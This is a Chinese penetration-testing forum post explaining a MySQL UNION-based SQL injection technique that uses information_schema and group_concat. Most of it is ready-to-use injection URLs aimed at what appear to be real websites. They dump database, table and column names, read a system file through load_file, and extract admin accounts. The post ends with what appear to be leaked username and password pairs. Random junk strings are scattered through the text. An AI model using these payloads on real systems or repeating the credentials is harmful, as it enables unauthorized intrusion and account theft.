找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql注入高效方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2165|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似5 b2 u! a9 B( V( i* f
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
8 }* ^" M& |6 a1 d
, x, L8 W! A+ z; ^3 x: @
2 j/ I3 [( y2 m6 ?- O: H* P. T优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入/ ^) l# w+ P1 L5 ^
- Z# S4 l9 l( d! U4 g7 G) O
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...# Z9 O! Z) c* _4 N+ G
; p: f) D! E3 H+ M
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示! Z. W3 `$ ]( u/ T, ~# `/ k
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
" y! [* _( y% W9 @# {* k4 z9 k' d8 [, D) D2 ^
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
- T3 H  p+ U! G1 [9 w$ p4 ~0 w0 r/ Y. k/ O/ w. E; m( h: N: K. }
读出所有库:0 w3 w6 h/ d. t2 k% f
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
6 P/ z0 L* K0 a7 l) [4 y
5 J. r1 |* s0 P* |8 M1 h; g* S7 t! S9 H6 I0 C
7 Z3 @$ u1 P3 D
读出所有表:
( N0 l6 d0 J, G3 r  T: thttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()! L5 \! {% F4 r5 C& W8 ?) q* D

: l. Y( [% Z! L读出所有表字段:
+ V* g9 o9 N/ [8 fhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)% R9 C6 l+ I- Z% u" N: X/ o
*/ (97,100,109,105,110)为admin的ascii码 依次类推
  R. O* Y+ z% Z! ]$ b, x
% \( E/ ^- g9 `/ g$ T; i5 J读出所有表字段里的内容:/ w7 ]8 c5 O* y/ B/ g/ f
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
; e% d* ~% N  H' h: i
) n$ i+ A- F* ?: z" c1 z/ `" b- h! C: k% c: \" H! ^
5 Z8 B" k  U4 ?1 d9 Y7 j* e

( p# q0 J1 R% |" g/ u- H9 g0 Z1 z, _4 x; q! t# S7 k1 Q" S! C

: W0 R1 X0 K. o* Mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
0 Y$ t# m) J3 A2 Q0 e% p
) x; d  C/ }: U( L* {, |6 V. [: |3 K$ ^, ]- m
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
  h" O  W- n1 U! Q2 M7 y0 M6 x( \% W1 [0 N! h6 g
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
9 p7 t# A3 ?( f2 F! j/ r  }* ~: K/ C0 S7 }% {
8 r) u. W; l2 `5 }6 W
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
. I6 B' o4 U% f7 ?% L- B5 K  x
: i/ n- b2 |, k$ g
; `; _1 g) k6 v: P, S1 o* W        webmaster:dzb521123,simlab:simadmin20043233
. v$ q- C' Y6 L
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表